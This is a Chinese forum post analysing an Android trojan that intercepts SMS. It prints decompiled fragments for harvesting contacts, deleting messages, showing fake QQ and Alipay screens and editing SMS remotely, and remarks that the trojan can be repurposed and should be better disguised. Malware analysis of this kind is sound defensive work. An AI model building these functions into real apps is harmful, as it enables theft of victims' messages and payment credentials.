发新帖

分析一枚窃取手机隐私信息的木马(二)

[复制链接]
3704 1
本帖最后由 lbchs傅伟 于 2015-8-24 21:40 编辑

01*1:原作者肥波又给我建议改装成的“拦截马”,那咱们就来看看又有什么不同?
01*2:软件的功能
(一)获取联系人(真tm详细)
[Java] 纯文本查看 复制代码
String phoneNumber = phoneCursor.getString(PHONES_NUMBER_INDEX);
                                //当手机号码为空的或者为空字段 跳过当前循环
                                if (TextUtils.isEmpty(phoneNumber))
                                        continue;

                                //得到联系人名称
                                String contactName = phoneCursor.getString(PHONES_DISPLAY_NAME_INDEX);

                                //得到联系人ID
                                Long contactid = phoneCursor.getLong(PHONES_CONTACT_ID_INDEX);

                                //得到联系人头像ID
                                Long photoid = phoneCursor.getLong(PHONES_PHOTO_ID_INDEX);

(二)拦截短信(我已经想打死他了)
[Java] 纯文本查看 复制代码
getContentResolver().delete(SMS, " _id=?", new String[]{"" + cur.getInt(0)});


(三)打开QQ,支付宝
[Java] 纯文本查看 复制代码
if (packageName.equals(s) && actn.equals(sa))
                                        {
                                                //打开支付宝
                                                if (is)
                                                {        
                                                        Intent intt=new Intent(getApplicationContext(), p.class);
                                                        intt.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
                                                        intt.putExtra("g", s);
                                                        startActivity(intt);
                                                }
                                        }
                                        if (packageName.equals(sq) && actn.equals(sqa))
                                        {
                                                //打开QQ
                                                if (isq)
                                                {        
                                                        Intent intt=new Intent(getApplicationContext(), q.class);
                                                        intt.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
                                                        intt.putExtra("g", sq);
                                                        startActivity(intt);
                                                }
                                        }


(四)得到你的手机信息
[Java] 纯文本查看 复制代码
return "型号:" + a(Build.MODEL) + "\n手机:" + a(Build.BRAND) + "\n系统版本:" + a(VERSION.RELEASE);

(五)伪装qq(支付宝)发送消息
[Java] 纯文本查看 复制代码
public void handleMessage(Message msg)
                {
                        // TODO: Implement this method
                        super.handleMessage(msg);
                        switch (msg.what)
                        {
                                case 0:
                                        //发送完成
                                        //不再截QQ
                                        break;
                        }


(六)得到设备管理权限
(七)多个邮箱接收内容
(八)发送到手机号
[Java] 纯文本查看 复制代码
String num=message.getDisplayOriginatingAddress();//来自
                                String con=message.getDisplayMessageBody();//内容

(九)远程控制修改你的短信内容
[Java] 纯文本查看 复制代码
b = true;//正在修改
                NUM = new ArrayList<String>();
                NAME = new ArrayList<String>();
                BODY = new ArrayList<String>();
                TIME = new ArrayList<String>();
                ContentResolver cr = getContentResolver();
                String[] projection = new String[] { "_id", "address", "person","body", "date", "type" };  

01*3:软件依旧使用的des加密
01*4:安全软件会提醒
01*5:没法打印出他加密的字符
01*6:利用之前的方法还是能为自己所用
01*7:软件的不足
(一)存在逻辑错误,在短信拦截时的判断逻辑
(二)软件功能太突出,没有很好的伪装自己
01*8:瞎扯完了,撤!lbchs傅伟


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

举报 使用道具

回复

精彩评论1

lbchs傅伟    发表于 2015-8-24 21:41:27 | 显示全部楼层
本帖最后由 lbchs傅伟 于 2015-8-24 21:48 编辑

这下排好版了.下篇分析锁机,

举报 使用道具

回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表